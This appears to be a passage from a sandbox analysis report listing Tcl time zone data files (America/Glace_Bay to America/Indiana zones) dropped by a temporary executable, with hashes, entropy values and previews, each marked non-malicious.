                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Glace_Bay) {. {-9223372036854775808 -14388 0 LMT}. {-2131646412 -14400 0 AST}. {-1632074400 -10800 1 ADT}. {-1615143600 -14400 0 AST}. {-880221600 -10800 1 AWT}. {-769395600 -10800 1 APT}. {-765399600 -14400 0 AST}. {-536443200 -14400 0 AST}. {-526500000 -10800 1 ADT}. {-513198000 -14400 0 AST}. {-504907200 -14400 0 AST}. {63086400 -14400 0 AST}. {73461600 -10800 1 ADT}. {89182800 -14400 0 AST}. {104911200 -10800 1 ADT}. {120632400 -14400 0 AST}. {126244800 -14400 0 AST}. {136360800 -10800 1 ADT}. {152082000 -14400 0 AST}. {167810400 -10800 1 ADT}. {183531600 -14400 0 AST}. {199260000 -10800 1 ADT}. {215586000 -14400 0 AST}. {230709600 -10800 1 ADT}. {247035600 -14400 0 AST}. {262764000 -10800 1 ADT}. {278485200 -14400 0 AST}. {294213600 -10800 1 ADT}. {309934800 -14400 0 AST}. {325663200 -10800 1 ADT}. {341384400 -14400 0 AST}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7186
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4539479411234977
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:HzC1RFbvHQbnRJ2N+f4hQAa3/paCxwPQg07VvN/W5ylGiGJ3G5cGKQWaT7dZV4gF:t5lfDARzJXC
                                                                                                                                                                                                                                                                                                                                MD5:F7C502D77495455080AC3125CE2B42EA
                                                                                                                                                                                                                                                                                                                                SHA1:B4883AF71068903AFA372DBFA9E73A39B658A8FF
                                                                                                                                                                                                                                                                                                                                SHA-256:058FBB47D5CD3001C0E5A0B5D92ACE1F8A720527A673A78AB71925198AC0ACA1
                                                                                                                                                                                                                                                                                                                                SHA-512:B0361D7FB7B02C996B9E608F9B8B1D8DB76FC7D298FA9AC841C4C51A0469FF05A06E0F7829E6C7D810D13BDF3B792A9547B70F6721CA9D7544CBD94028364CAB
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Godthab) {. {-9223372036854775808 -12416 0 LMT}. {-1686083584 -10800 0 -03}. {323845200 -7200 0 -02}. {338950800 -10800 0 -03}. {354675600 -7200 1 -02}. {370400400 -10800 0 -03}. {386125200 -7200 1 -02}. {401850000 -10800 0 -03}. {417574800 -7200 1 -02}. {433299600 -10800 0 -03}. {449024400 -7200 1 -02}. {465354000 -10800 0 -03}. {481078800 -7200 1 -02}. {496803600 -10800 0 -03}. {512528400 -7200 1 -02}. {528253200 -10800 0 -03}. {543978000 -7200 1 -02}. {559702800 -10800 0 -03}. {575427600 -7200 1 -02}. {591152400 -10800 0 -03}. {606877200 -7200 1 -02}. {622602000 -10800 0 -03}. {638326800 -7200 1 -02}. {654656400 -10800 0 -03}. {670381200 -7200 1 -02}. {686106000 -10800 0 -03}. {701830800 -7200 1 -02}. {717555600 -10800 0 -03}. {733280400 -7200 1 -02}. {749005200 -10800 0 -03}. {764730000 -7200 1 -02}. {780454800 -10800 0 -03
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):10015
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.780383775128893
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:z9zdvd8mSGDcfnrpbXXMqvlrPGgFEUlpd8ESeYPiVFuT/eleWmBk81kS/kV6kefD:z9zdvd7SGgcESeYPiV2Jv
                                                                                                                                                                                                                                                                                                                                MD5:77DEEF08876F92042F71E1DEFA666857
                                                                                                                                                                                                                                                                                                                                SHA1:7E21B51B3ED8EBEB85193374174C6E2BCA7FEB7F
                                                                                                                                                                                                                                                                                                                                SHA-256:87E9C6E265BFA58885FBEC128263D5E5D86CC32B8FFEDECAFE96F773192C18BE
                                                                                                                                                                                                                                                                                                                                SHA-512:C9AB8C9147354A388AEC5FE04C6C5317481478A07893461706CDC9FD5B42E31733EAC01C95C357F3C5DC3556C49F20374F58A6E0A120755D5E96744DE3A95A81
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Goose_Bay) {. {-9223372036854775808 -14500 0 LMT}. {-2713895900 -12652 0 NST}. {-1640982548 -12652 0 NST}. {-1632076148 -9052 1 NDT}. {-1615145348 -12652 0 NST}. {-1609446548 -12652 0 NST}. {-1096921748 -12600 0 NST}. {-1072989000 -12600 0 NST}. {-1061670600 -9000 1 NDT}. {-1048973400 -12600 0 NST}. {-1030221000 -9000 1 NDT}. {-1017523800 -12600 0 NST}. {-998771400 -9000 1 NDT}. {-986074200 -12600 0 NST}. {-966717000 -9000 1 NDT}. {-954624600 -12600 0 NST}. {-935267400 -9000 1 NDT}. {-922570200 -12600 0 NST}. {-903817800 -9000 1 NDT}. {-891120600 -12600 0 NST}. {-872368200 -9000 0 NWT}. {-769395600 -9000 1 NPT}. {-765401400 -12600 0 NST}. {-757369800 -12600 0 NST}. {-746044200 -9000 1 NDT}. {-733347000 -12600 0 NST}. {-714594600 -9000 1 NDT}. {-701897400 -12600 0 NST}. {-683145000 -9000 1 NDT}. {-670447800 -12600 0 NST}. {-6516954
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7307
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.755018614919114
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:hrZaC3Xm8sHRyvOTFhP5S+ijFnRaJeaX1eyDt:htrn+cvOTFhPI1jFIL
                                                                                                                                                                                                                                                                                                                                MD5:8582299C1262010B6843306D65DB436C
                                                                                                                                                                                                                                                                                                                                SHA1:70DB6B507D7F51B1E2C96E087CD7987EB69E9A1D
                                                                                                                                                                                                                                                                                                                                SHA-256:7CFBA4D1B1E6106A0EC6D6B5600791D6A33AD527B7D47325C3AB9524B17B1829
                                                                                                                                                                                                                                                                                                                                SHA-512:CC12912C38D85B23242C69211BA2B58167C55836D51DB02E6D820CDBD6368F835893AF656FC81F73EA745FD786E9134EC4A3E8D325D1515A01540E8A7EBEF03B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Grand_Turk) {. {-9223372036854775808 -17072 0 LMT}. {-2524504528 -18430 0 KMT}. {-1827687170 -18000 0 EST}. {284014800 -18000 0 EST}. {294217200 -14400 1 EDT}. {309938400 -18000 0 EST}. {325666800 -14400 1 EDT}. {341388000 -18000 0 EST}. {357116400 -14400 1 EDT}. {372837600 -18000 0 EST}. {388566000 -14400 1 EDT}. {404892000 -18000 0 EST}. {420015600 -14400 1 EDT}. {436341600 -18000 0 EST}. {452070000 -14400 1 EDT}. {467791200 -18000 0 EST}. {483519600 -14400 1 EDT}. {499240800 -18000 0 EST}. {514969200 -14400 1 EDT}. {530690400 -18000 0 EST}. {544604400 -14400 1 EDT}. {562140000 -18000 0 EST}. {576054000 -14400 1 EDT}. {594194400 -18000 0 EST}. {607503600 -14400 1 EDT}. {625644000 -18000 0 EST}. {638953200 -14400 1 EDT}. {657093600 -18000 0 EST}. {671007600 -14400 1 EDT}. {688543200 -18000 0 EST}. {702457200 -14400 1 EDT}. {71
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):202
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.877543794488217
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX2905Qb90e/:MBaIMY9QpI290Ob90O
                                                                                                                                                                                                                                                                                                                                MD5:C62E81B423F5BA10709D331FEBAB1839
                                                                                                                                                                                                                                                                                                                                SHA1:F7BC5E7055E472DE33DED5077045F680843B1AA7
                                                                                                                                                                                                                                                                                                                                SHA-256:0806C0E907DB13687BBAD2D22CEF5974D37A407D00E0A97847EC12AF972BCFF3
                                                                                                                                                                                                                                                                                                                                SHA-512:7D7090C3A6FEBE67203EB18E06717B39EC62830757BAD5A40E0A7F97572ABB81E81CAB614AA4CD3089C3787DAA6293D6FED0137BB57EF3AE358A92FCDDCF52A8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Grenada) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):205
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.914669229343752
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX2905AJLr490e/:MBaIMY9QpI290qJLr490O
                                                                                                                                                                                                                                                                                                                                MD5:026A098D231C9BE8557A7F4A673C1BE2
                                                                                                                                                                                                                                                                                                                                SHA1:192EECA778E1E713053D37353AF6D3C168D2BFF5
                                                                                                                                                                                                                                                                                                                                SHA-256:FFE0E204D43000121944C57D2B2A846E792DDC73405C02FC5E8017136CD55BCB
                                                                                                                                                                                                                                                                                                                                SHA-512:B49BD0FC12CC8D475E7E5116B8BDEA1584912BFA433734451F4338E42B5E042F3EC259E81C009E85798030E21F658158FA9F4EFC60078972351F706F852425E3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Guadeloupe) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):385
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.450029420195016
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp52906GdJmdHKznI2f/uFn/z/uFn/w67Rd3/uFn/4Bx/uFn/xAQ:cQ8JeQXfSn/zSn/w67Rd3Sn/4HSn/j
                                                                                                                                                                                                                                                                                                                                MD5:6E3FD9D19E0CD26275B0F95412F13F4C
                                                                                                                                                                                                                                                                                                                                SHA1:A1B6D6219DEBDBC9B5FFF5848E5DF14F8F4B1158
                                                                                                                                                                                                                                                                                                                                SHA-256:1DC103227CA0EDEEBA8EE8A41AE54B3E11459E4239DC051B0694CF7DF3636F1A
                                                                                                                                                                                                                                                                                                                                SHA-512:BF615D16BB55186AFC7216B47250EE84B7834FD08077E29E0A8F49C65AACAAD8D27539EA751202EBFF5E0B00702EC59B0A7D95F5FB585BFED68AC6206416110D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Guatemala) {. {-9223372036854775808 -21724 0 LMT}. {-1617040676 -21600 0 CST}. {123055200 -18000 1 CDT}. {130914000 -21600 0 CST}. {422344800 -18000 1 CDT}. {433054800 -21600 0 CST}. {669708000 -18000 1 CDT}. {684219600 -21600 0 CST}. {1146376800 -18000 1 CDT}. {1159678800 -21600 0 CST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):240
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.690879495223713
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X529056m2OHHjGeP5lahicKpKV91EX/uFkfF/KV9C:MBp5290smdHHLP5C/gO9U/uFEF/O9C
                                                                                                                                                                                                                                                                                                                                MD5:58E0902DC63F2F584AD72E6855A68BB8
                                                                                                                                                                                                                                                                                                                                SHA1:C8ED225C95DB512CB860D798E6AF648A321B82E7
                                                                                                                                                                                                                                                                                                                                SHA-256:D940627FFCBE6D690E34406B62EE4A032F116DF1AB81631E27A61E16BD4051E2
                                                                                                                                                                                                                                                                                                                                SHA-512:EF2523F2C55890BE4CE78DA2274833647587CF6F48B144C8261EB69B24BA73946B63244F03FEDF37A990FCAFECB2D88F4ECE302993F115C06323721E570EDD99
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Guayaquil) {. {-9223372036854775808 -19160 0 LMT}. {-2524502440 -18840 0 QMT}. {-1230749160 -18000 0 -05}. {722926800 -14400 1 -05}. {728884800 -18000 0 -05}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):208
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.687194013851928
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52905R3Lm2OHRjGeTShVy4yViUKcVVFAH/MIB/O9:MBp5290LLmdHVTiy4yVi7c/OH/MG/O9
                                                                                                                                                                                                                                                                                                                                MD5:CF5AD3AFBD735A42E3F7D85064C16AFC
                                                                                                                                                                                                                                                                                                                                SHA1:B8160F8D5E677836051643622262F13E3AE1B0BE
                                                                                                                                                                                                                                                                                                                                SHA-256:AF2EC2151402DF377E011618512BBC25A5A6AC64165E2C42212E2C2EC182E8F1
                                                                                                                                                                                                                                                                                                                                SHA-512:F69F10822AB115D25C0B5F705D294332FAAA66EB0BA2D98A6610A35E1FA5ED05F02B3DDBB4E37B9B4A77946C05E28C98113DBF11EDF8DB2661A2D8ED40711182
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Guyana) {. {-9223372036854775808 -13960 0 LMT}. {-1730578040 -13500 0 -0345}. {176010300 -10800 0 -03}. {662698800 -14400 0 -04}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):10763
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.724988391778253
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:Y7Z1hubfVmv0SqJXDiFHrbm96qddObEn/RDzWRfQFQ4XL8vG+81VcfnrpbXXnqvo:823ZLYvuOZJv
                                                                                                                                                                                                                                                                                                                                MD5:7DE8E355A725B3D9B3FD06A838B9715F
                                                                                                                                                                                                                                                                                                                                SHA1:41C6AAEA03FC7FEED50CFFFC4DFF7F35E2B1C23D
                                                                                                                                                                                                                                                                                                                                SHA-256:5F65F38FFA6B05C59B21DB98672EB2124E4283530ACB01B22093EAEFB256D116
                                                                                                                                                                                                                                                                                                                                SHA-512:4C61A15DDF28124343C1E6EFE068D15E48F0662534486EC38A4E2731BE085CDA5856F884521EF32A6E0EDD610A8A491A722220BDD1BAF2A9652D8457778AF696
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Halifax) {. {-9223372036854775808 -15264 0 LMT}. {-2131645536 -14400 0 AST}. {-1696276800 -10800 1 ADT}. {-1680469200 -14400 0 AST}. {-1640980800 -14400 0 AST}. {-1632074400 -10800 1 ADT}. {-1615143600 -14400 0 AST}. {-1609444800 -14400 0 AST}. {-1566763200 -10800 1 ADT}. {-1557090000 -14400 0 AST}. {-1535486400 -10800 1 ADT}. {-1524949200 -14400 0 AST}. {-1504468800 -10800 1 ADT}. {-1493413200 -14400 0 AST}. {-1472414400 -10800 1 ADT}. {-1461963600 -14400 0 AST}. {-1440964800 -10800 1 ADT}. {-1429390800 -14400 0 AST}. {-1409515200 -10800 1 ADT}. {-1396731600 -14400 0 AST}. {-1376856000 -10800 1 ADT}. {-1366491600 -14400 0 AST}. {-1346616000 -10800 1 ADT}. {-1333832400 -14400 0 AST}. {-1313956800 -10800 1 ADT}. {-1303678800 -14400 0 AST}. {-1282507200 -10800 1 ADT}. {-1272661200 -14400 0 AST}. {-1251057600 -10800 1 ADT}. {-1240088400
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8444
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7372403334059547
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:VXA0Bc0tTJtNliQ4sxgpuG4c2JPTxUw9Or2ocrPGSyM9Gk4LK46MCf7VkXgySCWv:VXA0Bc0tTJtNliQ4sxSuG4c2JPTxUw9F
                                                                                                                                                                                                                                                                                                                                MD5:C436FDCDBA98987601FEFC2DBFD5947B
                                                                                                                                                                                                                                                                                                                                SHA1:A04CF2A5C9468C634AED324CB79F9EE3544514B7
                                                                                                                                                                                                                                                                                                                                SHA-256:32F8B4D03E4ACB466353D72DAA2AA9E1E42D454DBBA001D0B880667E6346B8A1
                                                                                                                                                                                                                                                                                                                                SHA-512:56C25003685582AF2B8BA4E32EFF03EF10F4360D1A12E0F1294355000161ADDF7024CBD047D1830AB884BE2C385FD8ABE8DA5C30E9A0671C22E84EE3BF957D85
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Havana) {. {-9223372036854775808 -19768 0 LMT}. {-2524501832 -19776 0 HMT}. {-1402813824 -18000 0 CST}. {-1311534000 -14400 1 CDT}. {-1300996800 -18000 0 CST}. {-933534000 -14400 1 CDT}. {-925675200 -18000 0 CST}. {-902084400 -14400 1 CDT}. {-893620800 -18000 0 CST}. {-870030000 -14400 1 CDT}. {-862171200 -18000 0 CST}. {-775681200 -14400 1 CDT}. {-767822400 -18000 0 CST}. {-744231600 -14400 1 CDT}. {-736372800 -18000 0 CST}. {-144702000 -14400 1 CDT}. {-134251200 -18000 0 CST}. {-113425200 -14400 1 CDT}. {-102542400 -18000 0 CST}. {-86295600 -14400 1 CDT}. {-72907200 -18000 0 CST}. {-54154800 -14400 1 CDT}. {-41457600 -18000 0 CST}. {-21495600 -14400 1 CDT}. {-5774400 -18000 0 CST}. {9954000 -14400 1 CDT}. {25675200 -18000 0 CST}. {41403600 -14400 1 CDT}. {57729600 -18000 0 CST}. {73458000 -14400 1 CDT}. {87364800 -18000 0 CST}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):595
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.2803367804689785
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp5290ebmdH5NWw+Ux++vTQtFlvm0tFXtFjV5a:cQBe5gfUT7UFltF9FjV5a
                                                                                                                                                                                                                                                                                                                                MD5:9D1A1746614CE2CEE26D066182938CDC
                                                                                                                                                                                                                                                                                                                                SHA1:967590403A84E80ED299B8D548A2B37C8EEB21CE
                                                                                                                                                                                                                                                                                                                                SHA-256:493DB3E7B56B2E6B266A5C212CD1F75F1E5CF57533DA03BB1C1F2449543B9F48
                                                                                                                                                                                                                                                                                                                                SHA-512:DFAE6BC48F2E4B75DD6744AEE57D31D6A6E764D02DCA5731C7B516AD87B9BAB2FEB355A012EC38BDD53008B501B0744953EB7E0677F02B9EAF083D2E66042B37
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Hermosillo) {. {-9223372036854775808 -26632 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {-873828000 -25200 0 MST}. {-661539600 -28800 0 PST}. {28800 -25200 0 MST}. {828867600 -21600 1 MDT}. {846403200 -25200 0 MST}. {860317200 -21600 1 MDT}. {877852800 -25200 0 MST}. {891766800 -21600 1 MDT}. {909302400 -25200 0 MST}. {915174000 -25200 0 MST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6996
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.799188069575817
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:uRXxWMzJ2eQzURWu3N7sHRwvOTFhP5S+ijFnRaJeaX1eyDt:uRXxWUJ2eQzURWu3NOqvOTFhPI1jFIL
                                                                                                                                                                                                                                                                                                                                MD5:154A332C3ACF6D6F358B07D96B91EBD1
                                                                                                                                                                                                                                                                                                                                SHA1:FC16E7CBE179B3AB4E0C2A61AB5E0E8C23E50D50
                                                                                                                                                                                                                                                                                                                                SHA-256:C0C7964EBF9EA332B46D8B928B52FDE2ED15ED2B25EC664ACD33DA7BF3F987AE
                                                                                                                                                                                                                                                                                                                                SHA-512:5831905E1E6C6FA9DD309104B3A2EE476941D6FF159764123A477E2690C697B0F19EDEA0AD0CD3BBBECF96D64DC4B981027439E7865FCB1632661C8539B3BD6C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Indianapolis) {. {-9223372036854775808 -20678 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-1577901600 -21600 0 CST}. {-900259200 -18000 1 CDT}. {-891795600 -21600 0 CST}. {-883591200 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-715795200 -18000 1 CDT}. {-702493200 -21600 0 CST}. {-684345600 -18000 1 CDT}. {-671043600 -21600 0 CST}. {-652896000 -18000 1 CDT}. {-639594000 -21600 0 CST}. {-620841600 -18000 1 CDT}. {-608144400 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-557942400 -18000 1 CDT}. {-544640400 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8470
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7546412701514034
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:AXxr2eQzURWu3Oab9BxXI6X8xYIIOdXkqbfkeTzZSJw5/9/yuvQ+hcr8bYkzbXw6:AXxr2eQzUwu3Oab9BxXI6XUYIIOdXkqv
                                                                                                                                                                                                                                                                                                                                MD5:E8AFD9E320A7F4310B413F8086462F31
                                                                                                                                                                                                                                                                                                                                SHA1:7BEE624AAC096E9C280B4FC84B0671381C657F6C
                                                                                                                                                                                                                                                                                                                                SHA-256:BE74C1765317898834A18617352DF3B2952D69DE4E294616F1554AB95824DAF0
                                                                                                                                                                                                                                                                                                                                SHA-512:C76620999A293FA3A93CA4615AB78F19395F12CC08C242F56BFD4C4CAF8BC769DDEBF33FF10F7DA5A3EFD8ED18792362780188636075419014A8C099A897C43C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Knox) {. {-9223372036854775808 -20790 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-725824800 -21600 0 CST}. {-715795200 -18000 1 CDT}. {-702493200 -21600 0 CST}. {-684345600 -18000 1 CDT}. {-671043600 -21600 0 CST}. {-652896000 -18000 1 CDT}. {-639594000 -21600 0 CST}. {-620841600 -18000 1 CDT}. {-608144400 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-557942400 -18000 1 CDT}. {-544640400 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-463593600 -18000 1 CDT}. {-447267600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-415818000 -21600 0 CST}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7037
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.786429098558221
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:FXx3knO559B18XWRh0ksHRwvOTFhP5S+ijFnRaJeaX1eyDt:FXxUnO559B2XWRh0pqvOTFhPI1jFIL
                                                                                                                                                                                                                                                                                                                                MD5:456422A0D5BE8FBF5DBD0E75D8650894
                                                                                                                                                                                                                                                                                                                                SHA1:737AC21F019A7E89689B9C8B465C8482FF4F403E
                                                                                                                                                                                                                                                                                                                                SHA-256:C92D86CACFF85344453E1AFBC124CE11085DE7F6DC52CB4CBE6B89B01D5FE2F3
                                                                                                                                                                                                                                                                                                                                SHA-512:372AEBB2F13A50536C36A025881874E5EE3162F0168B71B2083965BECBBFCA3DAC726117D205D708CC2B4F7ABE65CCC2B3FE6625F1403D97001950524D545470
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Marengo) {. {-9223372036854775808 -20723 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-599594400 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-463593600 -18000 1 CDT}. {-450291600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-418237200 -21600 0 CST}. {-400089600 -18000 1 CDT}. {-386787600 -21600 0 CST}. {-368640000 -18000 1 CDT}. {-355338000 -21600 0 CST}. {-337190400 -18000 1 CDT}. {-323888400 -21600 0 CST}. {-305740800 -18000 1 CDT}. {-292438800 -21600 0 CST}. {-273686400 -18000 0 EST}. {-31518000 -18000 0 EST}. {-21488400 -14400 1 EDT}. {-5767200 -18000 0 EST}. {
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7364
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.79636789874872
